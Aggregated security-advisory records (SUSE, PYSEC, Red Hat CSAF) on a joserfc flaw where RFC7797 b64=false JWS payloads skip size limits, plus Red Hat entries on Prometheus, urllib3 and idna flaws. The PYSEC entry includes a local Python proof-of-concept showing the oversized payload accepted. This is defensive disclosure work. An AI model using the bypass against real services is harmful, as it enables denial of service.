{
"category": "product_version",
"name": "python311-joserfc-1.7.1-1.1.x86_64",
"product": {
"name": "python311-joserfc-1.7.1-1.1.x86_64",
"product_id": "python311-joserfc-1.7.1-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python313-joserfc-1.7.1-1.1.x86_64",
"product": {
"name": "python313-joserfc-1.7.1-1.1.x86_64",
"product_id": "python313-joserfc-1.7.1-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python314-joserfc-1.7.1-1.1.x86_64",
"product": {
"name": "python314-joserfc-1.7.1-1.1.x86_64",
"product_id": "python314-joserfc-1.7.1-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-joserfc-1.7.1-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-joserfc-1.7.1-1.1.aarch64"
},
"product_reference": "python311-joserfc-1.7.1-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-joserfc-1.7.1-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-joserfc-1.7.1-1.1.ppc64le"
},
"product_reference": "python311-joserfc-1.7.1-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-joserfc-1.7.1-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-joserfc-1.7.1-1.1.s390x"
},
"product_reference": "python311-joserfc-1.7.1-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-joserfc-1.7.1-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-joserfc-1.7.1-1.1.x86_64"
},
"product_reference": "python311-joserfc-1.7.1-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-joserfc-1.7.1-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-joserfc-1.7.1-1.1.aarch64"
},
"product_reference": "python313-joserfc-1.7.1-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-joserfc-1.7.1-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-joserfc-1.7.1-1.1.ppc64le"
},
"product_reference": "python313-joserfc-1.7.1-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-joserfc-1.7.1-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-joserfc-1.7.1-1.1.s390x"
},
"product_reference": "python313-joserfc-1.7.1-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-joserfc-1.7.1-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-joserfc-1.7.1-1.1.x86_64"
},
"product_reference": "python313-joserfc-1.7.1-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-joserfc-1.7.1-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-joserfc-1.7.1-1.1.aarch64"
},
"product_reference": "python314-joserfc-1.7.1-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-joserfc-1.7.1-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-joserfc-1.7.1-1.1.ppc64le"
},
"product_reference": "python314-joserfc-1.7.1-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-joserfc-1.7.1-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-joserfc-1.7.1-1.1.s390x"
},
"product_reference": "python314-joserfc-1.7.1-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-joserfc-1.7.1-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-joserfc-1.7.1-1.1.x86_64"
},
"product_reference": "python314-joserfc-1.7.1-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-48990",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-48990"
}
],
"notes": [
{
"category": "general",
"text": "joserfc is a Python library that provides an implementation of several JSON Object Signing and Encryption (JOSE) standards. In versions 1.3.4 through 1.6.5, joserfc accepts oversized RFC7797 b64=false JWS payloads without applying JWSRegistry.max_payload_length, which can lead to resource exhaustion. The normal JWS compact and flattened JSON paths reject payloads above the configured payload-size limit with ExceededSizeError. The RFC7797 unencoded payload paths do not make the same check. A valid b64=false compact or flattened JSON JWS can therefore deserialize successfully with a payload larger than JWSRegistry.max_payload_length. Applications that accept lower-trust JWS values and rely on joserfc to reject oversized token content during verification have a moderate availability risk. This issue has been fixed in version 1.6.7.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:python311-joserfc-1.7.1-1.1.aarch64",
"openSUSE Tumbleweed:python311-joserfc-1.7.1-1.1.ppc64le",
"openSUSE Tumbleweed:python311-joserfc-1.7.1-1.1.s390x",
"openSUSE Tumbleweed:python311-joserfc-1.7.1-1.1.x86_64",
"openSUSE Tumbleweed:python313-joserfc-1.7.1-1.1.aarch64",
"openSUSE Tumbleweed:python313-joserfc-1.7.1-1.1.ppc64le",
"openSUSE Tumbleweed:python313-joserfc-1.7.1-1.1.s390x",
"openSUSE Tumbleweed:python313-joserfc-1.7.1-1.1.x86_64",
"openSUSE Tumbleweed:python314-joserfc-1.7.1-1.1.aarch64",
"openSUSE Tumbleweed:python314-joserfc-1.7.1-1.1.ppc64le",
"openSUSE Tumbleweed:python314-joserfc-1.7.1-1.1.s390x",
"openSUSE Tumbleweed:python314-joserfc-1.7.1-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-48990",
"url": "https://www.suse.com/security/cve/CVE-2026-48990"
},
{
"category": "external",
"summary": "SUSE Bug 1268515 for CVE-2026-48990",
"url": "https://bugzilla.suse.com/1268515"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:python311-joserfc-1.7.1-1.1.aarch64",
"openSUSE Tumbleweed:python311-joserfc-1.7.1-1.1.ppc64le",
"openSUSE Tumbleweed:python311-joserfc-1.7.1-1.1.s390x",
"openSUSE Tumbleweed:python311-joserfc-1.7.1-1.1.x86_64",
"openSUSE Tumbleweed:python313-joserfc-1.7.1-1.1.aarch64",
"openSUSE Tumbleweed:python313-joserfc-1.7.1-1.1.ppc64le",
"openSUSE Tumbleweed:python313-joserfc-1.7.1-1.1.s390x",
"openSUSE Tumbleweed:python313-joserfc-1.7.1-1.1.x86_64",
"openSUSE Tumbleweed:python314-joserfc-1.7.1-1.1.aarch64",
"openSUSE Tumbleweed:python314-joserfc-1.7.1-1.1.ppc64le",
"openSUSE Tumbleweed:python314-joserfc-1.7.1-1.1.s390x",
"openSUSE Tumbleweed:python314-joserfc-1.7.1-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-19T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-48990"
}
]
}
PYSEC-2026-2530
Vulnerability from pysec - Published: 2026-07-13 15:46 - Updated: 2026-07-13 16:04RFC7797 b64=false JWS payloads bypass JWSRegistry payload-size limits during deserialization
Summary
Testing revealed that joserfc accepts oversized RFC7797 b64=false JWS payloads without applying JWSRegistry.max_payload_length.
The normal JWS compact and flattened JSON paths reject payloads above the configured payload-size limit with ExceededSizeError. The RFC7797 unencoded payload paths do not make the same check. A valid b64=false compact or flattened JSON JWS can therefore deserialize successfully with a payload larger than JWSRegistry.max_payload_length.
This creates a moderate availability/resource-exhaustion risk for applications that accept lower-trust JWS values and rely on joserfc to reject oversized token content during verification.
Affected Product
- Package:
joserfc - Ecosystem:
pip - Audited release:
1.6.5 - Audit tag:
1.6.5 - Audit commit:
881712980934fb601bed26fe3ae1ec0b7780e6f7 - Tested affected releases:
1.3.4,1.3.5,1.4.2,1.6.2,1.6.3,1.6.4,1.6.5 - Fixed release: none known
Vulnerability Details
In joserfc 1.6.5, the default JWS registry has max_payload_length = 128000 and exposes validate_payload_size().
The normal compact extraction path calls that check before base64url-decoding the payload. The RFC7797 compact path validates the header and signature segment sizes, then assigns the unencoded payload directly:
if is_rfc7797_enabled(protected):
if not payload_segment and payload:
payload_segment = to_bytes(payload)
payload = payload_segment
The flattened JSON RFC7797 path has the same pattern:
payload_segment = value["payload"].encode("utf-8")
if is_rfc7797_enabled(member.headers()):
payload = payload_segment
Neither branch calls registry.validate_payload_size(payload_segment) before accepting the unencoded payload.
Reproduction
The proof below uses only local Python APIs. It signs a payload one byte over the default limit and then compares normal JWS behavior with RFC7797 b64=false behavior.
Requirements:
python -m pip install "joserfc==1.6.5"
Run:
python joserfc_rfc7797_size_bypass_poc.py
Self-contained proof script:
#!/usr/bin/env python3
import json
import joserfc
from joserfc import jws
from joserfc.jwk import OctKey
def check_compact(name, header, payload, key):
token = jws.serialize_compact(header, payload, key)
try:
obj = jws.deserialize_compact(token, key)
return {
"case": name,
"accepted": True,
"exception": None,
"payload_len_after_deserialize": len(obj.payload),
}
except Exception as exc:
return {
"case": name,
"accepted": False,
"exception": type(exc).__name__,
"error": str(exc),
}
def check_json(name, protected, payload, key):
data = jws.serialize_json({"protected": protected}, payload, key)
try:
obj = jws.deserialize_json(data, key)
return {
"case": name,
"accepted": True,
"exception": None,
"payload_len_after_deserialize": len(obj.payload),
}
except Exception as exc:
return {
"case": name,
"accepted": False,
"exception": type(exc).__name__,
"error": str(exc),
}
key = OctKey.import_key("secret-secret-secret")
limit = jws.default_registry.max_payload_length
payload = "A" * (limit + 1)
results = {
"joserfc_version": joserfc.__version__,
"default_max_payload_length": limit,
"payload_len": len(payload),
"compact": [
check_compact("normal_b64_true", {"alg": "HS256"}, payload, key),
check_compact(
"rfc7797_b64_false",
{"alg": "HS256", "b64": False, "crit": ["b64"]},
payload,
key,
),
],
"json": [
check_json("normal_b64_true_json", {"alg": "HS256"}, payload, key),
check_json(
"rfc7797_b64_false_json",
{"alg": "HS256", "b64": False, "crit": ["b64"]},
payload,
key,
),
],
}
print(json.dumps(results, indent=2, sort_keys=True))
Expected output on 1.6.5 includes:
{
"default_max_payload_length": 128000,
"payload_len": 128001,
"compact": [
{
"case": "normal_b64_true",
"accepted": false,
"exception": "ExceededSizeError"
},
{
"case": "rfc7797_b64_false",
"accepted": true,
"exception": null,
"payload_len_after_deserialize": 128001
}
],
"json": [
{
"case": "normal_b64_true_json",
"accepted": false,
"exception": "ExceededSizeError"
},
{
"case": "rfc7797_b64_false_json",
"accepted": true,
"exception": null,
"payload_len_after_deserialize": 128001
}
]
}
Version Checks
I reproduced the same differential behavior on these releases:
| Version | Normal JWS over limit | RFC7797 b64=false over limit |
|---|---|---|
| 1.3.4 | ExceededSizeError |
accepted |
| 1.3.5 | ExceededSizeError |
accepted |
| 1.4.2 | ExceededSizeError |
accepted |
| 1.6.2 | ExceededSizeError |
accepted |
| 1.6.3 | ExceededSizeError |
accepted |
| 1.6.4 | ExceededSizeError |
accepted |
| 1.6.5 | ExceededSizeError |
accepted |
The exact earliest affected release may be broader. The versions above are the releases I directly tested where the JWS size-limit boundary exists and the RFC7797 path bypasses it.
Relationship to Existing Advisories
I found two related public advisories for joserfc, but neither appears to cover this root cause.
GHSA-frfh-8v73-gjg4 / CVE-2025-65015 describes oversized token parts being included in ExceededSizeError messages in older release ranges. The issue described here reproduces in 1.6.5 and is not about exception message content. The oversized RFC7797 payload is accepted instead of raising ExceededSizeError.
GHSA-w5r5-m38g-f9f9 / CVE-2026-27932 describes unbounded PBES2 p2c iteration counts during JWE decryption. The issue described here is in JWS RFC7797 payload extraction and does not involve PBES2 or JWE decryption.
Workarounds
Before a fixed release is available, affected applications can reduce exposure by rejecting oversized serialized JWS inputs before passing them to joserfc, disabling or disallowing RFC7797 b64=false tokens if not needed, and enforcing strict request/header/body size limits at the application or reverse-proxy layer.
Suggested Remediation
Apply registry.validate_payload_size(payload_segment) to RFC7797 unencoded payloads before assigning them to the JWS object in both compact and flattened JSON extraction paths. Detached RFC7797 compact payloads supplied through the payload argument should be checked in the same way.
| Name | purl | joserfc | pkg:pypi/joserfc |
|---|
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "joserfc",
"purl": "pkg:pypi/joserfc"
},
"ranges": [
{
"events": [
{
"introduced": "1.3.4"
},
{
"fixed": "1.6.7"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"1.3.4",
"1.3.5",
"1.4.0",
"1.4.1",
"1.4.2",
"1.4.3",
"1.5.0",
"1.6.0",
"1.6.1",
"1.6.2",
"1.6.3",
"1.6.4",
"1.6.5"
]
}
],
"aliases": [
"CVE-2026-48990",
"GHSA-wphv-vfrh-23q5"
],
"details": "# RFC7797 b64=false JWS payloads bypass JWSRegistry payload-size limits during deserialization\n\n## Summary\n\nTesting revealed that `joserfc` accepts oversized RFC7797 `b64=false` JWS payloads without applying `JWSRegistry.max_payload_length`.\n\nThe normal JWS compact and flattened JSON paths reject payloads above the configured payload-size limit with `ExceededSizeError`. The RFC7797 unencoded payload paths do not make the same check. A valid `b64=false` compact or flattened JSON JWS can therefore deserialize successfully with a payload larger than `JWSRegistry.max_payload_length`.\n\nThis creates a moderate availability/resource-exhaustion risk for applications that accept lower-trust JWS values and rely on `joserfc` to reject oversized token content during verification.\n\n## Affected Product\n\n- Package: `joserfc`\n- Ecosystem: `pip`\n- Audited release: `1.6.5`\n- Audit tag: `1.6.5`\n- Audit commit: `881712980934fb601bed26fe3ae1ec0b7780e6f7`\n- Tested affected releases: `1.3.4`, `1.3.5`, `1.4.2`, `1.6.2`, `1.6.3`, `1.6.4`, `1.6.5`\n- Fixed release: none known\n\n## Vulnerability Details\n\nIn `joserfc` 1.6.5, the default JWS registry has `max_payload_length = 128000` and exposes `validate_payload_size()`.\n\nThe normal compact extraction path calls that check before base64url-decoding the payload. The RFC7797 compact path validates the header and signature segment sizes, then assigns the unencoded payload directly:\n\n```text\nif is_rfc7797_enabled(protected):\n if not payload_segment and payload:\n payload_segment = to_bytes(payload)\n payload = payload_segment\n```\n\nThe flattened JSON RFC7797 path has the same pattern:\n\n```text\npayload_segment = value[\"payload\"].encode(\"utf-8\")\nif is_rfc7797_enabled(member.headers()):\n payload = payload_segment\n```\n\nNeither branch calls `registry.validate_payload_size(payload_segment)` before accepting the unencoded payload.\n\n## Reproduction\n\nThe proof below uses only local Python APIs. It signs a payload one byte over the default limit and then compares normal JWS behavior with RFC7797 `b64=false` behavior.\n\nRequirements:\n\n```bash\npython -m pip install \"joserfc==1.6.5\"\n```\n\nRun:\n\n```bash\npython joserfc_rfc7797_size_bypass_poc.py\n```\n\nSelf-contained proof script:\n\n```python\n#!/usr/bin/env python3\nimport json\n\nimport joserfc\nfrom joserfc import jws\nfrom joserfc.jwk import OctKey\n\n\ndef check_compact(name, header, payload, key):\n token = jws.serialize_compact(header, payload, key)\n try:\n obj = jws.deserialize_compact(token, key)\n return {\n \"case\": name,\n \"accepted\": True,\n \"exception\": None,\n \"payload_len_after_deserialize\": len(obj.payload),\n }\n except Exception as exc:\n return {\n \"case\": name,\n \"accepted\": False,\n \"exception\": type(exc).__name__,\n \"error\": str(exc),\n }\n\n\ndef check_json(name, protected, payload, key):\n data = jws.serialize_json({\"protected\": protected}, payload, key)\n try:\n obj = jws.deserialize_json(data, key)\n return {\n \"case\": name,\n \"accepted\": True,\n \"exception\": None,\n \"payload_len_after_deserialize\": len(obj.payload),\n }\n except Exception as exc:\n return {\n \"case\": name,\n \"accepted\": False,\n \"exception\": type(exc).__name__,\n \"error\": str(exc),\n }\n\n\nkey = OctKey.import_key(\"secret-secret-secret\")\nlimit = jws.default_registry.max_payload_length\npayload = \"A\" * (limit + 1)\n\nresults = {\n \"joserfc_version\": joserfc.__version__,\n \"default_max_payload_length\": limit,\n \"payload_len\": len(payload),\n \"compact\": [\n check_compact(\"normal_b64_true\", {\"alg\": \"HS256\"}, payload, key),\n check_compact(\n \"rfc7797_b64_false\",\n {\"alg\": \"HS256\", \"b64\": False, \"crit\": [\"b64\"]},\n payload,\n key,\n ),\n ],\n \"json\": [\n check_json(\"normal_b64_true_json\", {\"alg\": \"HS256\"}, payload, key),\n check_json(\n \"rfc7797_b64_false_json\",\n {\"alg\": \"HS256\", \"b64\": False, \"crit\": [\"b64\"]},\n payload,\n key,\n ),\n ],\n}\nprint(json.dumps(results, indent=2, sort_keys=True))\n```\n\nExpected output on `1.6.5` includes:\n\n```json\n{\n \"default_max_payload_length\": 128000,\n \"payload_len\": 128001,\n \"compact\": [\n {\n \"case\": \"normal_b64_true\",\n \"accepted\": false,\n \"exception\": \"ExceededSizeError\"\n },\n {\n \"case\": \"rfc7797_b64_false\",\n \"accepted\": true,\n \"exception\": null,\n \"payload_len_after_deserialize\": 128001\n }\n ],\n \"json\": [\n {\n \"case\": \"normal_b64_true_json\",\n \"accepted\": false,\n \"exception\": \"ExceededSizeError\"\n },\n {\n \"case\": \"rfc7797_b64_false_json\",\n \"accepted\": true,\n \"exception\": null,\n \"payload_len_after_deserialize\": 128001\n }\n ]\n}\n```\n\n## Version Checks\n\nI reproduced the same differential behavior on these releases:\n\n| Version | Normal JWS over limit | RFC7797 `b64=false` over limit |\n| --- | --- | --- |\n| 1.3.4 | `ExceededSizeError` | accepted |\n| 1.3.5 | `ExceededSizeError` | accepted |\n| 1.4.2 | `ExceededSizeError` | accepted |\n| 1.6.2 | `ExceededSizeError` | accepted |\n| 1.6.3 | `ExceededSizeError` | accepted |\n| 1.6.4 | `ExceededSizeError` | accepted |\n| 1.6.5 | `ExceededSizeError` | accepted |\n\nThe exact earliest affected release may be broader. The versions above are the releases I directly tested where the JWS size-limit boundary exists and the RFC7797 path bypasses it.\n\n## Relationship to Existing Advisories\n\nI found two related public advisories for `joserfc`, but neither appears to cover this root cause.\n\n`GHSA-frfh-8v73-gjg4` / `CVE-2025-65015` describes oversized token parts being included in `ExceededSizeError` messages in older release ranges. The issue described here reproduces in `1.6.5` and is not about exception message content. The oversized RFC7797 payload is accepted instead of raising `ExceededSizeError`.\n\n`GHSA-w5r5-m38g-f9f9` / `CVE-2026-27932` describes unbounded PBES2 `p2c` iteration counts during JWE decryption. The issue described here is in JWS RFC7797 payload extraction and does not involve PBES2 or JWE decryption.\n\n## Workarounds\n\nBefore a fixed release is available, affected applications can reduce exposure by rejecting oversized serialized JWS inputs before passing them to `joserfc`, disabling or disallowing RFC7797 `b64=false` tokens if not needed, and enforcing strict request/header/body size limits at the application or reverse-proxy layer.\n\n## Suggested Remediation\n\nApply `registry.validate_payload_size(payload_segment)` to RFC7797 unencoded payloads before assigning them to the JWS object in both compact and flattened JSON extraction paths. Detached RFC7797 compact payloads supplied through the `payload` argument should be checked in the same way.",
"id": "PYSEC-2026-2530",
"modified": "2026-07-13T16:04:21.873233Z",
"published": "2026-07-13T15:46:24.974794Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/authlib/joserfc/security/advisories/GHSA-wphv-vfrh-23q5"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48990"
},
{
"type": "PACKAGE",
"url": "https://github.com/authlib/joserfc"
},
{
"type": "WEB",
"url": "https://github.com/authlib/joserfc/releases/tag/1.6.7"
},
{
"type": "PACKAGE",
"url": "https://pypi.org/project/joserfc"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-wphv-vfrh-23q5"
}
],
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
],
"summary": "joserfc: b64=false RFC7797 JWS payloads bypass JWSRegistry payload-size limits during deserialization"
}
RHSA-2026:25039
Vulnerability from csaf_redhat - Published: 2026-06-10 09:34 - Updated: 2026-08-04 22:34A flaw was found in Prometheus, an open-source monitoring system. The `client_secret` field within the Azure Active Directory (AD) remote write OAuth configuration was incorrectly handled as a plain string instead of a secure Secret type. This misconfiguration allowed any user or process with access to the `/-/config` HTTP API endpoint to view the Azure OAuth client secret in plaintext. This vulnerability leads to information disclosure, potentially compromising the security of integrated Azure AD services.
A flaw was found in Prometheus. An unauthenticated attacker can exploit the remote read endpoint (`/api/v1/read`) by sending a specially crafted, small snappy-compressed payload. This payload causes a disproportionately large memory allocation, leading to memory exhaustion and a Denial of Service (DoS) by crashing the Prometheus process.
A flaw was found in urllib3, an HTTP client library for Python. When using the low-level API via `ProxyManager.connection_from_url().urlopen()` with `assert_same_host=False`, cross-origin redirects can still forward sensitive headers. This could allow a remote attacker to gain unauthorized access to sensitive information.
A flaw was found in urllib3, an HTTP client library for Python. This vulnerability allows a remote attacker to cause excessive resource consumption, such as high CPU usage and massive memory allocation, on the client side. This occurs when urllib3 attempts to decompress an entire HTTP response, even if only a partial read was requested, or when draining the connection after a partial decompression. This can lead to a Denial of Service (DoS) condition.
A flaw was found in the idna library, which handles Internationalized Domain Names in Python applications. A remote attacker could exploit this vulnerability by sending specially crafted, excessively long inputs to the library's encoding function. This could cause the system to consume significant resources, leading to a Denial of Service (DoS), where the affected application becomes unavailable to legitimate users. This issue stems from an incomplete fix for a previously identified vulnerability.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Hardened Images:jaeger-main@aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Hardened Images:jaeger-main@src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Hardened Images:jaeger-main@x86_64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in joserfc, a Python library for JSON Object Signing and Encryption (JOSE). This vulnerability allows a remote attacker to cause resource exhaustion, leading to a Denial of Service (DoS), by sending oversized JSON Web Signature (JWS) payloads. The library fails to apply size limits, specifically JWSRegistry.max_payload_length, when processing RFC7797 b64=false JWS payloads.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Hardened Images:jaeger-main@aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Hardened Images:jaeger-main@src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Hardened Images:jaeger-main@x86_64 | — |
Vendor Fix
fix
Workaround
|
| URL | Category |
|---|---|
| https://access.redhat.com/errata/RHSA-2026:25039 | self |
| https://images.redhat.com/ | external |
| https://access.redhat.com/security/cve/CVE-2026-48990 | external |
| https://access.redhat.com/security/updates/classi… | external |
| https://access.redhat.com/security/cve/CVE-2026-44432 | external |
| https://access.redhat.com/security/cve/CVE-2026-44431 | external |
| https://access.redhat.com/security/cve/CVE-2026-42154 | external |
| https://access.redhat.com/security/cve/CVE-2026-42151 | external |
| https://access.redhat.com/security/cve/CVE-2026-45409 | external |
| https://security.access.redhat.com/data/csaf/v2/a… | self |
| https://access.redhat.com/security/cve/CVE-2026-42151 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2466507 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-42151 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-42151 | external |
| https://github.com/prometheus/prometheus/pull/18587 | external |
| https://github.com/prometheus/prometheus/pull/18590 | external |
| https://github.com/prometheus/prometheus/releases… | external |
| https://github.com/prometheus/prometheus/releases… | external |
| https://github.com/prometheus/prometheus/security… | external |
| https://access.redhat.com/security/cve/CVE-2026-42154 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2466505 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-42154 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-42154 | external |
| https://github.com/prometheus/prometheus/pull/18584 | external |
| https://github.com/prometheus/prometheus/pull/18585 | external |
| https://github.com/prometheus/prometheus/security… | external |
| https://access.redhat.com/security/cve/CVE-2026-44431 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477167 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-44431 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-44431 | external |
| https://github.com/urllib3/urllib3/security/advis… | external |
| https://access.redhat.com/security/cve/CVE-2026-44432 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477154 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-44432 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-44432 | external |
| https://github.com/urllib3/urllib3/security/advis… | external |
| https://access.redhat.com/security/cve/CVE-2026-45409 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2485616 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-45409 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-45409 | external |
| https://github.com/kjd/idna/security/advisories/G… | external |
| https://access.redhat.com/security/cve/CVE-2026-48990 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2490168 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-48990 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-48990 | external |
| https://github.com/authlib/joserfc/releases/tag/1.6.7 | external |
| https://github.com/authlib/joserfc/security/advis… | external |
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for Red Hat Hardened Images RPMs is now available.",
"title": "Topic"
},
{
"category": "general",
"text": "This update includes the following RPMs:\n\njaeger:\n * jaeger-2.19.0-1.hum1 (aarch64, x86_64)\n * jaeger-2.19.0-1.hum1.src (src)",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:25039",
"url": "https://access.redhat.com/errata/RHSA-2026:25039"
},
{
"category": "external",
"summary": "https://images.redhat.com/",
"url": "https://images.redhat.com/"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-48990",
"url": "https://access.redhat.com/security/cve/CVE-2026-48990"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-44432",
"url": "https://access.redhat.com/security/cve/CVE-2026-44432"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-44431",
"url": "https://access.redhat.com/security/cve/CVE-2026-44431"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42154",
"url": "https://access.redhat.com/security/cve/CVE-2026-42154"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42151",
"url": "https://access.redhat.com/security/cve/CVE-2026-42151"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-45409",
"url": "https://access.redhat.com/security/cve/CVE-2026-45409"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_25039.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Hardened Images RPMs bug fix and enhancement update",
"tracking": {
"current_release_date": "2026-08-04T22:34:55+00:00",
"generator": {
"date": "2026-08-04T22:34:55+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "5.3.8"
}
},
"id": "RHSA-2026:25039",
"initial_release_date": "2026-06-10T09:34:54+00:00",
"revision_history": [
{
"date": "2026-06-10T09:34:54+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-08-01T08:08:43+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-08-04T22:34:55+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Hardened Images",
"product": {
"name": "Red Hat Hardened Images",
"product_id": "Red Hat Hardened Images",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:hummingbird:1"
}
}
}
